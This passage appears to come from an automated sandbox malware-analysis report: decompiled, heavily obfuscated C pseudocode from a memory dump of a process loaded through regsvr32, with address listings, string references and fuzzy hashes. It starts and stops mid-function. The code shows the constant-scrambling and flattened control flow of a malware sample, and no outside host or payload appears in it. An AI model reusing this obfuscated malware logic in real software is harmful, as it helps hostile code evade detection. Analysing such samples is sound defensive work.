				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E04B44178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E04B4FE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E04B4E1F8(0x4b31224, _v92, _t344);
									_t335 = E04B3473D(_a20, _v176, _v168, 0x4b31224, 0x4b31224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x4b31224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E04B4FECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					L04B47952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}

0x04b40185
0x04b4018e
0x04b40190
0x04b40197
0x04b4019e
0x04b401a5
0x04b401ac
0x04b401b3
0x04b401b4
0x04b401bb
0x04b401bc
0x04b401bd
0x04b401c2
0x04b401c9
0x04b401cc
0x04b401d3
0x04b401d5
0x04b401e2
0x04b401ed
0x04b401f2
0x04b40200
0x04b40205
0x04b4020b
0x04b40213
0x04b4021b
0x04b40220
0x04b40221
0x04b40225
0x04b4022d
0x04b40235
0x04b4023d
0x04b40245
0x04b4024d
0x04b4025a
0x04b4025e
0x04b40266
0x04b4026e
0x04b40276
0x04b4027e
0x04b40286
0x04b4028e
0x04b40293
0x04b4029b
0x04b402a3
0x04b402a8
0x04b402ad
0x04b402b5
0x04b402bd
0x04b402c5
0x04b402cd
0x04b402d5
0x04b402dd
0x04b402e5
0x04b402f2
0x04b402f6
0x04b402fe
0x04b4030c
0x04b40310
0x04b40318
0x04b40325
0x04b40329
0x04b40331
0x04b4033e
0x04b4034a
0x04b4034f
0x04b40355
0x04b4035d
0x04b40365
0x04b4036d
0x04b40375
0x04b4037d
0x04b40385
0x04b4038d
0x04b4039a
0x04b4039d
0x04b403a1
0x04b403ae
0x04b403b2
0x04b403ba
0x04b403c2
0x04b403ca
0x04b403d2
0x04b403d7
0x04b403df
0x04b403ec
0x04b403f0
0x04b403f8
0x04b40400
0x04b40405
0x04b4040d
0x04b40415
0x04b40422
0x04b40426
0x04b4042e
0x04b40436
0x04b40442
0x04b40445
0x04b40449
0x04b40451
0x04b40459
0x04b40461
0x04b40469
0x04b40471
0x04b40479
0x04b40481
0x04b40486
0x04b4048e
0x04b40496
0x04b4049e
0x04b404a6
0x04b404ae
0x04b404b6
0x04b404be
0x04b404c6
0x04b404cb
0x04b404d3
0x04b404db
0x04b404e3
0x04b404eb
0x04b404f3
0x04b404fb
0x04b40503
0x04b40507
0x04b4050f
0x04b40517
0x04b40524
0x04b40528
0x04b40530
0x04b40535
0x04b4053d
0x04b4054a
0x04b40557
0x04b40560
0x04b40564
0x04b4056c
0x04b40574
0x04b4057c
0x04b40584
0x04b4058c
0x04b40594
0x04b40594
0x04b405a6
0x04b406c4
0x00000000
0x04b405ac
0x04b405ae
0x04b4069a
0x04b406ad
0x04b406b1
0x04b406b6
0x04b406b9
0x04b406bb
0x04b406bd
0x00000000
0x04b406bd
0x04b405b4
0x04b405b4
0x04b405b6
0x00000000
0x04b405bc
0x04b405ce
0x04b405d3
0x04b405dc
0x04b405e7
0x04b405eb
0x04b405fe
0x04b4066c
0x04b40684
0x04b40689
0x04b4068c
0x00000000
0x04b4068c
0x04b405b6
0x04b405ae
0x00000000
0x04b405a6
0x04b406cf
0x04b406da
0x04b406e0
0x04b406e5
0x04b406e5
0x04b406e5
0x04b406f2
0x04b406fd

Strings

D41, xrefs: 04B40469
{I, xrefs: 04B4069A, 04B406A8
A|6, xrefs: 04B406AD
-, xrefs: 04B40276
D, xrefs: 04B405DC
7+, xrefs: 04B4021B
ch, xrefs: 04B404BE
iD, xrefs: 04B4057C

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -$7+$A|6$D$D41$ch$iD${I
API String ID: 0-1622838380
Opcode ID: 93cda4f68aa3672ee6817bc5c4adbb10fff34218d7d06d096ade4cbe1b85c123
Instruction ID: 6097ba6505c89acd890f734afcdab2ee8d7685959d12c1d98310568d9dd448b4
Opcode Fuzzy Hash: 93cda4f68aa3672ee6817bc5c4adbb10fff34218d7d06d096ade4cbe1b85c123
Instruction Fuzzy Hash: 3AD10DB25083819FD3A8CF61C889A1BFBE1FBC5358F508A1DF69596260D3B59948DF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B427F9, Relevance: 10.2, Strings: 8, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B427F9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				short* _t249;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t260;
				intOrPtr _t267;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int* _t294;

				_t294 =  &_v1144;
				_v1076 = 0xe2454d;
				_v1076 = _v1076 << 0xe;
				_t260 = 0xa27996a;
				_v1076 = _v1076 ^ 0x9150c829;
				_v1116 = 0xb7d7ba;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0637cdcd;
				_v1064 = 0x633f3;
				_t288 = 7;
				_v1064 = _v1064 / _t288;
				_v1064 = _v1064 ^ 0x000e68da;
				_v1044 = 0x68e137;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x000f94d8;
				_v1104 = 0x560a82;
				_t289 = 0x4d;
				_v1104 = _v1104 * 0x12;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0x32f73e43;
				_v1128 = 0x20b49c;
				_v1128 = _v1128 + 0xffff9350;
				_v1128 = _v1128 / _t289;
				_v1128 = _v1128 + 0xffff69f1;
				_v1128 = _v1128 ^ 0xfff8ef71;
				_v1144 = 0xda057e;
				_v1144 = _v1144 | 0x61d5fb11;
				_v1144 = _v1144 + 0x9b0d;
				_t290 = 0x47;
				_v1144 = _v1144 / _t290;
				_v1144 = _v1144 ^ 0x016fc7d6;
				_v1108 = 0xd954d9;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 * 0x2a;
				_v1108 = _v1108 ^ 0x047d2f3f;
				_v1084 = 0xee9532;
				_v1084 = _v1084 | 0x01e1ea12;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0xb61982a0;
				_v1136 = 0x9da312;
				_v1136 = _v1136 * 0xb;
				_v1136 = _v1136 + 0xfaec;
				_v1136 = _v1136 << 4;
				_v1136 = _v1136 ^ 0x6c675c41;
				_v1048 = 0x5b4722;
				_v1048 = _v1048 + 0x58c6;
				_v1048 = _v1048 ^ 0x0051fe1e;
				_v1140 = 0xb81c47;
				_v1140 = _v1140 | 0xf47f3da9;
				_v1140 = _v1140 + 0xffffb1b6;
				_v1140 = _v1140 * 0x52;
				_v1140 = _v1140 ^ 0x79a8ba01;
				_v1100 = 0x4ec91e;
				_v1100 = _v1100 + 0xffff658a;
				_v1100 = _v1100 + 0xa7da;
				_v1100 = _v1100 ^ 0x004d9e7a;
				_v1056 = 0xd22e34;
				_v1056 = _v1056 * 0x39;
				_v1056 = _v1056 ^ 0x2eccf222;
				_v1092 = 0x4415ff;
				_v1092 = _v1092 << 0xc;
				_v1092 = _v1092 + 0xffffcb4f;
				_v1092 = _v1092 ^ 0x4156ca29;
				_v1112 = 0xebdea7;
				_v1112 = _v1112 + 0xffff30b5;
				_v1112 = _v1112 ^ 0x44658fef;
				_v1112 = _v1112 ^ 0x4481ff75;
				_v1132 = 0x210e2f;
				_v1132 = _v1132 + 0x4766;
				_v1132 = _v1132 >> 6;
				_t291 = 0x78;
				_v1132 = _v1132 / _t291;
				_v1132 = _v1132 ^ 0x000739d3;
				_v1072 = 0xec15b6;
				_v1072 = _v1072 + 0xf74;
				_v1072 = _v1072 ^ 0x00e11cf3;
				_v1096 = 0xda8ada;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x00036eb4;
				_v1120 = 0x69db3;
				_v1120 = _v1120 + 0x311c;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x00187b2b;
				_v1068 = 0x7459e2;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000d8df4;
				_v1060 = 0x7a5957;
				_v1060 = _v1060 + 0x9cd0;
				_v1060 = _v1060 ^ 0x007b6b01;
				_v1088 = 0xc3c012;
				_v1088 = _v1088 >> 0x10;
				_v1088 = _v1088 << 5;
				_v1088 = _v1088 ^ 0x00089583;
				_v1124 = 0x7ac281;
				_v1124 = _v1124 >> 0xa;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 + 0xc97f;
				_v1124 = _v1124 ^ 0x00055573;
				_v1052 = 0x890174;
				_v1052 = _v1052 + 0xa006;
				_v1052 = _v1052 ^ 0x008bc550;
				_v1080 = 0xeb1cb6;
				_v1080 = _v1080 ^ 0x4b3beb78;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x00025049;
				while(_t260 != 0x3b56309) {
					if(_t260 == 0x7219719) {
						E04B4DC71();
						L8:
						_t260 = 0x9bc0f5a;
						continue;
					}
					if(_t260 == 0x9631a61) {
						_t249 = E04B409DD(_v1060,  &_v1040, _v1088, _v1124);
						__eflags = 0;
						 *_t249 = 0;
						return E04B3856E( &_v1040, _v1052, _v1080);
					}
					if(_t260 == 0x9bc0f5a) {
						_push(_v1128);
						_push(_v1104);
						_push(_v1044);
						_t251 = E04B4E1F8(0x4b31000, _v1064, __eflags);
						_t267 =  *0x4b56214; // 0x0
						_t253 =  *0x4b56214; // 0x0
						E04B52D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
						E04B4FECB(_t251, _v1140, _v1100, _v1056, _v1092);
						_t294 =  &(_t294[0xe]);
						_t260 = 0x3b56309;
						continue;
					}
					if(_t260 == 0xa27996a) {
						_t257 =  *0x4b56214; // 0x0
						__eflags =  *((intOrPtr*)(_t257 + 0x20));
						_t260 =  !=  ? 0xb537953 : 0x7219719;
						continue;
					}
					if(_t260 != 0xb537953) {
						L13:
						__eflags = _t260 - 0xf6a818b;
						if(__eflags != 0) {
							continue;
						}
						return _t257;
					}
					_t257 = E04B3A445();
					goto L8;
				}
				E04B31CA1(_v1112, _v1132, _v1072,  &_v520);
				E04B4654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
				_t294 =  &(_t294[5]);
				_t260 = 0x9631a61;
				goto L13;
			}

0x04b427f9
0x04b427ff
0x04b42809
0x04b4280e
0x04b42813
0x04b4281b
0x04b42823
0x04b42831
0x04b42835
0x04b4283d
0x04b4284b
0x04b42850
0x04b42856
0x04b4285e
0x04b42866
0x04b4286b
0x04b42873
0x04b42880
0x04b42883
0x04b42887
0x04b4288c
0x04b42894
0x04b4289c
0x04b428ac
0x04b428b0
0x04b428b8
0x04b428c0
0x04b428c8
0x04b428d0
0x04b428dc
0x04b428df
0x04b428e3
0x04b428eb
0x04b428f3
0x04b428fd
0x04b42901
0x04b42909
0x04b42911
0x04b4291e
0x04b42922
0x04b4292a
0x04b42937
0x04b4293b
0x04b42943
0x04b42948
0x04b42950
0x04b42958
0x04b42960
0x04b42968
0x04b42970
0x04b42978
0x04b42985
0x04b42989
0x04b42991
0x04b42999
0x04b429a1
0x04b429a9
0x04b429b1
0x04b429be
0x04b429c2
0x04b429cc
0x04b429d9
0x04b429e3
0x04b429f0
0x04b429f8
0x04b42a00
0x04b42a08
0x04b42a10
0x04b42a18
0x04b42a20
0x04b42a28
0x04b42a33
0x04b42a36
0x04b42a3a
0x04b42a42
0x04b42a4a
0x04b42a52
0x04b42a5a
0x04b42a62
0x04b42a6c
0x04b42a70
0x04b42a78
0x04b42a80
0x04b42a88
0x04b42a8d
0x04b42a95
0x04b42a9d
0x04b42aa2
0x04b42aaa
0x04b42ab2
0x04b42aba
0x04b42ac2
0x04b42aca
0x04b42acf
0x04b42ad4
0x04b42adc
0x04b42ae4
0x04b42ae9
0x04b42aee
0x04b42af6
0x04b42afe
0x04b42b06
0x04b42b0e
0x04b42b16
0x04b42b1e
0x04b42b26
0x04b42b2b
0x04b42b33
0x04b42b41
0x04b42c06
0x04b42b70
0x04b42b70
0x00000000
0x04b42b70
0x04b42b4d
0x04b42c70
0x04b42c7d
0x04b42c7f
0x00000000
0x04b42c8e
0x04b42b55
0x04b42b84
0x04b42b8d
0x04b42b91
0x04b42b99
0x04b42b9e
0x04b42bc3
0x04b42bd6
0x04b42bf0
0x04b42bf5
0x04b42bf8
0x00000000
0x04b42bf8
0x04b42b5d
0x04b42b74
0x04b42b7b
0x04b42b7f
0x00000000
0x04b42b7f
0x04b42b61
0x04b42c52
0x04b42c52
0x04b42c58
0x00000000
0x00000000
0x00000000
0x04b42c58
0x04b42b6b
0x00000000
0x04b42b6b
0x04b42c24
0x04b42c45
0x04b42c4a
0x04b42c4d
0x00000000

Strings

Yt, xrefs: 04B42A95
ME, xrefs: 04B427FF
7h, xrefs: 04B4285E
fG, xrefs: 04B42A20
A\gl, xrefs: 04B42948
x;K, xrefs: 04B42B1E
"G[, xrefs: 04B42950
WYz, xrefs: 04B42AAA

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
API String ID: 0-2581693823
Opcode ID: 49271d54660e114e35d33435e27eee8b3342661efd685a14c742bb89bc8a2790
Instruction ID: 0e00c2105f8521d7046fb492035d05e46545414482444bc0470cb06ade08ee6a
Opcode Fuzzy Hash: 49271d54660e114e35d33435e27eee8b3342661efd685a14c742bb89bc8a2790
Instruction Fuzzy Hash: D7C12CB24093418FD368CF26C58A51BBBF1FBC4748F108A5DF29686260D3B19A09DF83

Uniqueness

Uniqueness Score: -1.00%

Function 04B517BD, Relevance: 9.1, Strings: 7, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04B517BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E04B4FE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
				_v1644 = _v1644 ^ 0x280f1fa3;
				_v1644 = _v1644 | 0x80dcb776;
				_v1644 = _v1644 ^ 0xa8d7b48e;
				_v1612 = 0x310401;
				_v1612 = _v1612 << 0xc;
				_v1612 = _v1612 ^ 0x10456323;
				_v1708 = 0xec7d3e;
				_v1708 = _v1708 + 0xffff4756;
				_t465 = 0x19;
				_v1708 = _v1708 / _t465;
				_v1708 = _v1708 * 0x78;
				_v1708 = _v1708 ^ 0x04625198;
				_v1676 = 0xc1499c;
				_v1676 = _v1676 + 0x787f;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 >> 0xd;
				_v1676 = _v1676 ^ 0x0006bbad;
				_v1620 = 0xc8864f;
				_v1620 = _v1620 + 0xdb64;
				_t466 = 0x71;
				_v1620 = _v1620 / _t466;
				_v1620 = _v1620 ^ 0x00054ec4;
				_v1716 = 0x58bfc6;
				_v1716 = _v1716 << 0xc;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 >> 0xa;
				_v1716 = _v1716 ^ 0x00309503;
				_v1584 = 0x2a66b4;
				_t467 = 0x6c;
				_v1584 = _v1584 * 0x62;
				_v1584 = _v1584 ^ 0x103c6d70;
				_v1628 = 0xcd0e9a;
				_v1628 = _v1628 + 0xffff6b98;
				_v1628 = _v1628 + 0xffffdc7c;
				_v1628 = _v1628 ^ 0x00cd4883;
				_v1684 = 0x7bfe73;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 * 0x31;
				_v1684 = _v1684 ^ 0x5ee8daf9;
				_v1660 = 0x1f1c01;
				_v1660 = _v1660 >> 4;
				_v1660 = _v1660 / _t467;
				_v1660 = _v1660 ^ 0x000ccbd2;
				_v1720 = 0x840fb2;
				_v1720 = _v1720 | 0xa69eff81;
				_v1720 = _v1720 << 0xe;
				_v1720 = _v1720 + 0xffff3037;
				_v1720 = _v1720 ^ 0xbfecb97e;
				_v1656 = 0xd8a297;
				_v1656 = _v1656 + 0x41c1;
				_v1656 = _v1656 ^ 0x1d9d441b;
				_v1656 = _v1656 ^ 0x1d437da6;
				_v1580 = 0xe77586;
				_v1580 = _v1580 + 0xfffff7e8;
				_v1580 = _v1580 ^ 0x00e53b2f;
				_v1728 = 0x20c0e;
				_v1728 = _v1728 + 0x594f;
				_t468 = 0x79;
				_v1728 = _v1728 / _t468;
				_v1728 = _v1728 ^ 0x017ec3a2;
				_v1728 = _v1728 ^ 0x01734834;
				_v1712 = 0x467deb;
				_v1712 = _v1712 | 0xfb06902d;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 0xb;
				_v1712 = _v1712 ^ 0xef0dc14e;
				_v1632 = 0xa85c1c;
				_v1632 = _v1632 << 3;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x54293107;
				_v1596 = 0x697bfe;
				_v1596 = _v1596 | 0x748d72c7;
				_v1596 = _v1596 ^ 0x74e3de32;
				_v1640 = 0x724245;
				_t222 =  &_v1640; // 0x724245
				_v1640 =  *_t222 * 0x4c;
				_t224 =  &_v1640; // 0x724245
				_v1640 =  *_t224 * 0x26;
				_v1640 = _v1640 ^ 0x08f66fe6;
				_v1648 = 0xa241b2;
				_v1648 = _v1648 >> 4;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x890355d2;
				_v1604 = 0x4e61c6;
				_v1604 = _v1604 | 0x297abf50;
				_v1604 = _v1604 ^ 0x29742082;
				_v1608 = 0xdfdd08;
				_v1608 = _v1608 | 0x096e656f;
				_v1608 = _v1608 ^ 0x09fe8e74;
				_v1624 = 0x7e1789;
				_v1624 = _v1624 + 0xd6ac;
				_v1624 = _v1624 + 0xffff1ac7;
				_v1624 = _v1624 ^ 0x007fce14;
				_v1688 = 0xd4150c;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 ^ 0x561d7592;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x001f305a;
				_v1696 = 0x3e923d;
				_v1696 = _v1696 ^ 0x624df4c6;
				_t469 = 0x29;
				_v1696 = _v1696 / _t469;
				_v1696 = _v1696 + 0xffffe680;
				_v1696 = _v1696 ^ 0x026755ff;
				_v1704 = 0xed73af;
				_t470 = 0x36;
				_v1704 = _v1704 / _t470;
				_v1704 = _v1704 * 0x76;
				_v1704 = _v1704 >> 3;
				_v1704 = _v1704 ^ 0x0041c6e0;
				_v1664 = 0xe0489c;
				_v1664 = _v1664 * 0x4e;
				_v1664 = _v1664 * 0x21;
				_v1664 = _v1664 << 0xf;
				_v1664 = _v1664 ^ 0x084e6c7b;
				_v1672 = 0xcef4bd;
				_v1672 = _v1672 * 0x4b;
				_v1672 = _v1672 + 0xffff3dcb;
				_v1672 = _v1672 << 0x10;
				_v1672 = _v1672 ^ 0xf1249f73;
				_v1680 = 0x187dc5;
				_v1680 = _v1680 | 0x94fddf65;
				_v1680 = _v1680 << 1;
				_v1680 = _v1680 ^ 0x244f0190;
				_v1680 = _v1680 ^ 0x0db75cb9;
				_v1616 = 0xe6e563;
				_v1616 = _v1616 ^ 0xa5d4beb7;
				_v1616 = _v1616 + 0xffffcebd;
				_v1616 = _v1616 ^ 0xa53dba5b;
				do {
					while(_t425 != 0x6a96cc9) {
						if(_t425 == 0xabcd6f9) {
							_push(_t425);
							__eflags = E04B485FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
							_t462 =  !=  ? 1 : _t462;
						} else {
							if(_t425 == 0xbbc45e7) {
								E04B31A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
								_t475 =  &(_t475[8]);
								_t425 = 0xe9b1f6b;
								continue;
							} else {
								_t482 = _t425 - 0xe9b1f6b;
								if(_t425 != 0xe9b1f6b) {
									goto L8;
								} else {
									_push(_v1644);
									_push(_v1724);
									_push(_v1652);
									_t412 = E04B4E1F8(0x4b31030, _v1692, _t482);
									E04B37078( &_v1560, _t482);
									_t415 =  *0x4b56214; // 0x0
									_t419 =  *0x4b56214; // 0x0
									L04B3F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
									E04B4FECB(_t412, _v1584, _v1628, _v1684, _v1660);
									_t475 =  &(_t475[0x10]);
									_t425 = 0xabcd6f9;
									continue;
								}
							}
						}
						L11:
						return _t462;
					}
					_push(_v1728);
					_t346 =  &_v1580; // 0xe53b2f
					_push( *_t346);
					_push(_v1656);
					_t397 = E04B4E1F8(0x4b310f0, _v1720, __eflags);
					E04B37078( &_v1560, __eflags);
					_t400 =  *0x4b56214; // 0x0
					_t402 =  *0x4b56214; // 0x0
					__eflags = _t402 + 0x23c;
					E04B3BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
